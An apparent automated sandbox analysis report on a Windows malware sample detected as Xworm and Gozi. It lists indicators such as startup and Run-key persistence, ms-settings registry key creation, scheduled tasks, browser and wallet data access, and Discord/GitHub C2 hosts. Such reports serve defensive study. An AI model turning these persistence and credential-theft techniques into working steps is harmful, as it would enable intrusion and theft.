Analysis Overview
SHA256
8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435
Threat Level: Known bad
The file Gk67Vl was found to be: Known bad.
Malicious Activity Summary
Xworm
Gozi
Detect Xworm Payload
Checks computer location settings
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Detects Pyinstaller
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-10 17:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-10 17:38
Reported
2024-03-10 17:43
Platform
win10v2004-20240226-en
Max time kernel
237s
Max time network
236s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target | Count |
| N/A | N/A | N/A | N/A | 2 |
Gozi
Xworm
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Win (3).exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe | C:\Users\Admin\AppData\Local\Temp\pythonw.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target | Count |
| N/A | discord.com | N/A | N/A | 3 |
| N/A | raw.githubusercontent.com | N/A | N/A | 1 |
| N/A | discord.com | N/A | N/A | 4 |
| N/A | raw.githubusercontent.com | N/A | N/A | 1 |
| N/A | discord.com | N/A | N/A | 55 |
Looks up external IP address via web service
| Description | Indicator | Process | Target | Count |
| N/A | ip-api.com | N/A | N/A | 1 |
| N/A | api.ipify.org | N/A | N/A | 4 |
| N/A | checkip.amazonaws.com | N/A | N/A | 1 |
| N/A | api.ipify.org | N/A | N/A | 2 |
Detects Pyinstaller
| Description | Indicator | Process | Target | Count |
| N/A | N/A | N/A | N/A | 4 |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1246" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\NodeSlot = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\1\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 020000000100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target | Count |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A | 1 |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A | 1 |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A | 2 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 3 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinRAR.exe | N/A | 2 |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A | 1 |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A | 1 |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A | 1 |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A | 1 |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe | N/A | 2 |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 23 |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 22 |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Gk67Vl.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe773146f8,0x7ffe77314708,0x7ffe77314718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
